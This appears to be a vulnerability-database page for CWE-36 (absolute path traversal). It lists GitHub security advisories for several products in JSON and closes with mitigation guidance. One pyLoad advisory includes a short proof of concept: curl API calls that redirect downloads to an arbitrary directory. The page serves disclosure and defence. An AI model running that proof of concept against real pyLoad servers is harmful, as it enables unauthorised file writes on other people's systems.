CWE-36
AllowedAbsolute Path Traversal
Abstraction: Base · Status: Draft
The product uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize absolute path sequences such as "/abs/path" that can resolve to a location that is outside of that directory.
245 vulnerabilities reference this CWE, most recent first.
GHSA-6H7G-F9WV-5JQ5
Vulnerability from github – Published: 2022-05-24 19:07 – Updated: 2022-05-24 19:07Absolute Path Traversal vulnerability in GetImage in QSAN Storage Manager allows remote authenticated attackers download arbitrary files via the Url path parameter.
{
"affected": [],
"aliases": [
"CVE-2021-32506"
],
"database_specific": {
"cwe_ids": [
"CWE-22",
"CWE-36"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2021-07-07T14:15:00Z",
"severity": "MODERATE"
},
"details": "Absolute Path Traversal vulnerability in GetImage in QSAN Storage Manager allows remote authenticated attackers download arbitrary files via the Url path parameter.",
"id": "GHSA-6h7g-f9wv-5jq5",
"modified": "2022-05-24T19:07:04Z",
"published": "2022-05-24T19:07:04Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-32506"
},
{
"type": "WEB",
"url": "https://www.twcert.org.tw/tw/cp-132-4862-f8b86-1.html"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-6PWX-MRWJ-WC74
Vulnerability from github – Published: 2025-09-12 06:30 – Updated: 2025-09-12 06:30The LWS Cleaner plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the 'lws_cl_delete_file' function in all versions up to, and including, 2.4.1.3. This makes it possible for authenticated attackers, with Administrator-level access and above, to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php).
{
"affected": [],
"aliases": [
"CVE-2025-8575"
],
"database_specific": {
"cwe_ids": [
"CWE-36"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-09-12T06:15:43Z",
"severity": "HIGH"
},
"details": "The LWS Cleaner plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the \u0027lws_cl_delete_file\u0027 function in all versions up to, and including, 2.4.1.3. This makes it possible for authenticated attackers, with Administrator-level access and above, to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php).",
"id": "GHSA-6pwx-mrwj-wc74",
"modified": "2025-09-12T06:30:26Z",
"published": "2025-09-12T06:30:26Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8575"
},
{
"type": "WEB",
"url": "https://plugins.trac.wordpress.org/browser/lws-cleaner/trunk/lws-cleaner.php#L1144"
},
{
"type": "WEB",
"url": "https://plugins.trac.wordpress.org/changeset/3359598"
},
{
"type": "WEB",
"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/fa37025a-7f20-4cfe-a7d0-38168f49b6d9?source=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-6QQ9-3Q4Q-R8RX
Vulnerability from github – Published: 2025-08-22 12:30 – Updated: 2025-08-22 12:30WebITR developed by Uniong has an Arbitrary File Reading vulnerability, allowing remote attackers with regular privileges to exploit Absolute Path Traversal to download arbitrary system files.
{
"affected": [],
"aliases": [
"CVE-2025-9258"
],
"database_specific": {
"cwe_ids": [
"CWE-36"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-08-22T12:15:34Z",
"severity": "HIGH"
},
"details": "WebITR developed by Uniong has an Arbitrary File Reading vulnerability, allowing remote attackers with regular privileges to exploit Absolute Path Traversal to download arbitrary system files.",
"id": "GHSA-6qq9-3q4q-r8rx",
"modified": "2025-08-22T12:30:31Z",
"published": "2025-08-22T12:30:31Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-9258"
},
{
"type": "WEB",
"url": "https://www.twcert.org.tw/en/cp-139-10329-a1c5d-2.html"
},
{
"type": "WEB",
"url": "https://www.twcert.org.tw/tw/cp-132-10328-dbc35-1.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-6V62-48R8-7WH2
Vulnerability from github – Published: 2025-01-14 18:32 – Updated: 2025-10-22 00:33Absolute path traversal in Ivanti EPM before the 2024 January-2025 Security Update and 2022 SU6 January-2025 Security Update allows a remote unauthenticated attacker to leak sensitive information.
{
"affected": [],
"aliases": [
"CVE-2024-13159"
],
"database_specific": {
"cwe_ids": [
"CWE-36"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-01-14T18:15:26Z",
"severity": "CRITICAL"
},
"details": "Absolute path traversal in Ivanti EPM before the 2024 January-2025 Security Update and 2022 SU6 January-2025 Security Update allows a remote unauthenticated attacker to leak sensitive information.",
"id": "GHSA-6v62-48r8-7wh2",
"modified": "2025-10-22T00:33:12Z",
"published": "2025-01-14T18:32:01Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-13159"
},
{
"type": "WEB",
"url": "https://forums.ivanti.com/s/article/Security-Advisory-EPM-January-2025-for-EPM-2024-and-EPM-2022-SU6"
},
{
"type": "WEB",
"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2024-13159"
},
{
"type": "WEB",
"url": "https://www.horizon3.ai/attack-research/attack-blogs/ivanti-endpoint-manager-multiple-credential-coercion-vulnerabilities"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-787C-QPX2-RPG5
Vulnerability from github – Published: 2023-07-13 03:30 – Updated: 2024-04-04 06:06Path Traversal vulnerability in SonicWall GMS and Analytics allows a remote authenticated attacker to read arbitrary files from the underlying file system via web service. This issue affects GMS: 9.3.2-SP1 and earlier versions; Analytics: 2.5.0.4-R7 and earlier versions.
{
"affected": [],
"aliases": [
"CVE-2023-34135"
],
"database_specific": {
"cwe_ids": [
"CWE-22",
"CWE-36"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-07-13T03:15:09Z",
"severity": "MODERATE"
},
"details": "Path Traversal vulnerability in SonicWall GMS and Analytics allows a remote authenticated attacker to read arbitrary files from the underlying file system via web service. This issue affects GMS: 9.3.2-SP1 and earlier versions; Analytics: 2.5.0.4-R7 and earlier versions.\n\n",
"id": "GHSA-787c-qpx2-rpg5",
"modified": "2024-04-04T06:06:15Z",
"published": "2023-07-13T03:30:48Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-34135"
},
{
"type": "WEB",
"url": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0010"
},
{
"type": "WEB",
"url": "https://www.sonicwall.com/support/notices/230710150218060"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-7HHJ-47V7-PG7C
Vulnerability from github – Published: 2026-07-10 06:31 – Updated: 2026-07-10 06:31The ARMember plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 4.0.27 via the 'X-FILENAME' HTTP header. This makes it possible for unauthenticated attackers to upload and overwrite certain files (e.g., CSS) to directories outside the 'wp-content/uploads/armember' directory.
{
"affected": [],
"aliases": [
"CVE-2026-15302"
],
"database_specific": {
"cwe_ids": [
"CWE-36"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-07-10T05:16:33Z",
"severity": "MODERATE"
},
"details": "The ARMember plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 4.0.27 via the \u0027X-FILENAME\u0027 HTTP header. This makes it possible for unauthenticated attackers to upload and overwrite certain files (e.g., CSS) to directories outside the \u0027wp-content/uploads/armember\u0027 directory.",
"id": "GHSA-7hhj-47v7-pg7c",
"modified": "2026-07-10T06:31:21Z",
"published": "2026-07-10T06:31:21Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-15302"
},
{
"type": "WEB",
"url": "https://plugins.trac.wordpress.org/changeset/3062692/armember-membership/trunk/core/classes/class.arm_members_activity.php"
},
{
"type": "WEB",
"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/2c8734f5-4d23-454d-bf00-6e9d36982098?source=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-7HR6-MVJP-X5QV
Vulnerability from github – Published: 2025-06-29 00:30 – Updated: 2025-06-29 00:30In Netgate pfSense CE 2.8.0, the "WebCfg - Diagnostics: Command" privilege allows reading arbitrary files via diag_command.php dlPath directory traversal. NOTE: the Supplier's perspective is that this is intended behavior for this privilege level, and that system administrators are informed through both the product documentation and UI.
{
"affected": [],
"aliases": [
"CVE-2025-53392"
],
"database_specific": {
"cwe_ids": [
"CWE-36"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-06-28T23:15:21Z",
"severity": "MODERATE"
},
"details": "In Netgate pfSense CE 2.8.0, the \"WebCfg - Diagnostics: Command\" privilege allows reading arbitrary files via diag_command.php dlPath directory traversal. NOTE: the Supplier\u0027s perspective is that this is intended behavior for this privilege level, and that system administrators are informed through both the product documentation and UI.",
"id": "GHSA-7hr6-mvjp-x5qv",
"modified": "2025-06-29T00:30:19Z",
"published": "2025-06-29T00:30:19Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-53392"
},
{
"type": "WEB",
"url": "https://github.com/skraft9/pfsense-security-research"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-7J6H-J855-CHVW
Vulnerability from github – Published: 2026-03-06 15:31 – Updated: 2026-03-10 18:31An Absolute Path Traversal vulnerability exists in Navtor NavBox. The application exposes an HTTP service that fails to properly sanitize user-supplied path input. Unauthenticated remote attackers can exploit this issue by submitting requests containing absolute filesystem paths. Successful exploitation allows the attacker to retrieve arbitrary files from the underlying filesystem, limited only by the privileges of the service process. This can lead to the exposure of sensitive configuration files and system information.
{
"affected": [],
"aliases": [
"CVE-2026-2753"
],
"database_specific": {
"cwe_ids": [
"CWE-36"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-03-06T15:16:11Z",
"severity": "HIGH"
},
"details": "An Absolute Path Traversal vulnerability exists in Navtor NavBox. The application exposes an HTTP service that fails to properly sanitize user-supplied path input. Unauthenticated remote attackers can exploit this issue by submitting requests containing absolute filesystem paths. Successful exploitation allows the attacker to retrieve arbitrary files from the underlying filesystem, limited only by the privileges of the service process. This can lead to the exposure of sensitive configuration files and system information.",
"id": "GHSA-7j6h-j855-chvw",
"modified": "2026-03-10T18:31:14Z",
"published": "2026-03-06T15:31:30Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2753"
},
{
"type": "WEB",
"url": "https://cydome.io/vulnerability-advisory-cve-2026-2753-in-navtor-navbox-version-4-12-0-3"
},
{
"type": "WEB",
"url": "https://www.navtor.com/navtor-vendor-statement"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-7V9Q-J964-43QC
Vulnerability from github – Published: 2022-05-13 01:32 – Updated: 2025-10-22 00:31In WinRAR versions prior to and including 5.61, There is path traversal vulnerability when crafting the filename field of the ACE format (in UNACEV2.dll). When the filename field is manipulated with specific patterns, the destination (extraction) folder is ignored, thus treating the filename as an absolute path.
{
"affected": [],
"aliases": [
"CVE-2018-20250"
],
"database_specific": {
"cwe_ids": [
"CWE-22",
"CWE-36"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2019-02-05T20:29:00Z",
"severity": "HIGH"
},
"details": "In WinRAR versions prior to and including 5.61, There is path traversal vulnerability when crafting the filename field of the ACE format (in UNACEV2.dll). When the filename field is manipulated with specific patterns, the destination (extraction) folder is ignored, thus treating the filename as an absolute path.",
"id": "GHSA-7v9q-j964-43qc",
"modified": "2025-10-22T00:31:37Z",
"published": "2022-05-13T01:32:24Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2018-20250"
},
{
"type": "WEB",
"url": "https://github.com/blau72/CVE-2018-20250-WinRAR-ACE"
},
{
"type": "WEB",
"url": "https://research.checkpoint.com/extracting-code-execution-from-winrar"
},
{
"type": "WEB",
"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2018-20250"
},
{
"type": "WEB",
"url": "https://www.exploit-db.com/exploits/46552"
},
{
"type": "WEB",
"url": "https://www.exploit-db.com/exploits/46756"
},
{
"type": "WEB",
"url": "https://www.win-rar.com/whatsnew.html"
},
{
"type": "WEB",
"url": "http://packetstormsecurity.com/files/152618/RARLAB-WinRAR-ACE-Format-Input-Validation-Remote-Code-Execution.html"
},
{
"type": "WEB",
"url": "http://www.rapid7.com/db/modules/exploit/windows/fileformat/winrar_ace"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/bid/106948"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-838G-GR43-QQG9
Vulnerability from github – Published: 2026-05-05 21:18 – Updated: 2026-06-08 19:48Summary
No sanitization of package folder name allows writing files anywhere outside the intended download directory.
Affected Component
src/pyload/core/api/__init__.py- Function:
set_package_data()
Details
When passing a folder name in the set_package_data() API function call inside the data object with key "_folder", there is no sanitization at all, allowing a user with Perms.MODIFY to specify arbitrary directories as download locations for a package.
PoC
1) Create a package, note response package ID e.g. 5
curl -X 'POST' \
'http://localhost:8000/api/add_package' \
-H 'accept: application/json' \
-H 'X-API-Key: <valid api key>' \
-H 'Content-Type: application/json' \
-d '{
"name": "set_package_data_exploit_poc",
"links": [
"http://example.com/file.txt"
],
"dest": 1
}'
2) Call set_package_data for this package ID with an arbitrary directory
curl -X 'POST' \
'http://localhost:8000/api/set_package_data' \
-H 'accept: */*' \
-H 'X-API-Key: <valid api key>' \
-H 'Content-Type: application/json' \
-d '{
"package_id": 5,
"data": {
"_folder": "/users/root/"
}
}'
3) New download folder will be set without any checks
curl -X 'GET' \
'http://localhost:8000/api/get_queue' \
-H 'accept: application/json' \
-H 'X-API-Key: <valid api key>'
Response:
[
{
"pid": 5,
"name": "set_package_data_exploit_poc",
"folder": "/users/root/",
"site": "",
"password": "",
"dest": 1,
"order": 1,
"linksdone": 0,
"sizedone": 0,
"sizetotal": 0,
"linkstotal": 1,
"links": null,
"fids": null
}
]
Impact
Allows Absolute Path Traversal to write in an arbitrary directory as long as the pyLoad process has write access.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 0.5.0b3.dev99"
},
"package": {
"ecosystem": "PyPI",
"name": "pyload-ng"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.5.0b3.dev100"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-42315"
],
"database_specific": {
"cwe_ids": [
"CWE-22",
"CWE-36"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-05T21:18:19Z",
"nvd_published_at": "2026-05-11T18:16:35Z",
"severity": "HIGH"
},
"details": "### Summary\nNo sanitization of package folder name allows writing files anywhere outside the intended download directory.\n\n#### Affected Component\n- `src/pyload/core/api/__init__.py`\n- Function: `set_package_data()`\n\n### Details\nWhen passing a folder name in the `set_package_data()` API function call inside the data object with key `\"_folder\"`, there is no sanitization at all, allowing a user with `Perms.MODIFY` to specify arbitrary directories as download locations for a package.\n\n### PoC\n1) Create a package, note response package ID e.g. `5`\n```\ncurl -X \u0027POST\u0027 \\\n \u0027http://localhost:8000/api/add_package\u0027 \\\n -H \u0027accept: application/json\u0027 \\\n -H \u0027X-API-Key: \u003cvalid api key\u003e\u0027 \\\n -H \u0027Content-Type: application/json\u0027 \\\n -d \u0027{\n \"name\": \"set_package_data_exploit_poc\",\n \"links\": [\n \"http://example.com/file.txt\"\n ],\n \"dest\": 1\n}\u0027\n```\n\n2) Call set_package_data for this package ID with an arbitrary directory \n```\ncurl -X \u0027POST\u0027 \\\n \u0027http://localhost:8000/api/set_package_data\u0027 \\\n -H \u0027accept: */*\u0027 \\\n -H \u0027X-API-Key: \u003cvalid api key\u003e\u0027 \\\n -H \u0027Content-Type: application/json\u0027 \\\n -d \u0027{\n \"package_id\": 5,\n \"data\": {\n \"_folder\": \"/users/root/\"\n }\n}\u0027\n```\n\n3) New download folder will be set without any checks\n```\ncurl -X \u0027GET\u0027 \\\n \u0027http://localhost:8000/api/get_queue\u0027 \\\n -H \u0027accept: application/json\u0027 \\\n -H \u0027X-API-Key: \u003cvalid api key\u003e\u0027\n```\nResponse:\n```\n[\n {\n \"pid\": 5,\n \"name\": \"set_package_data_exploit_poc\",\n \"folder\": \"/users/root/\",\n \"site\": \"\",\n \"password\": \"\",\n \"dest\": 1,\n \"order\": 1,\n \"linksdone\": 0,\n \"sizedone\": 0,\n \"sizetotal\": 0,\n \"linkstotal\": 1,\n \"links\": null,\n \"fids\": null\n }\n]\n```\n\n### Impact\nAllows Absolute Path Traversal to write in an arbitrary directory as long as the pyLoad process has write access.",
"id": "GHSA-838g-gr43-qqg9",
"modified": "2026-06-08T19:48:40Z",
"published": "2026-05-05T21:18:19Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/pyload/pyload/security/advisories/GHSA-838g-gr43-qqg9"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42315"
},
{
"type": "PACKAGE",
"url": "https://github.com/pyload/pyload"
},
{
"type": "WEB",
"url": "https://github.com/pypa/advisory-database/tree/main/vulns/pyload-ng/PYSEC-2026-129.yaml"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "PyLoad vulnerable to Path Traversal via Package Folder Name in set_package_data"
}
Mitigation MIT-5.1
Strategy: Input Validation
- Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.
- When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue."
- Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.
- When validating filenames, use stringent allowlists that limit the character set to be used. If feasible, only allow a single "." character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as "/" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434.
- Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering "/" is insufficient protection if the filesystem also supports the use of "\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if "../" sequences are removed from the ".../...//" string in a sequential fashion, two instances of "../" would be removed from the original string, but the remaining characters would still form the "../" string.
Mitigation MIT-20
Strategy: Input Validation
Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked.
Mitigation MIT-29
Strategy: Firewall
Use an application firewall that can detect attacks against this weakness. It can be beneficial in cases in which the code cannot be fixed (because it is controlled by a third party), as an emergency prevention measure while more comprehensive software assurance measures are applied, or to provide defense in depth [REF-1481].
CAPEC-597: Absolute Path Traversal
An adversary with access to file system resources, either directly or via application logic, will use various file absolute paths and navigation mechanisms such as ".." to extend their range of access to inappropriate areas of the file system. The goal of the adversary is to access directories and files that are intended to be restricted from their access.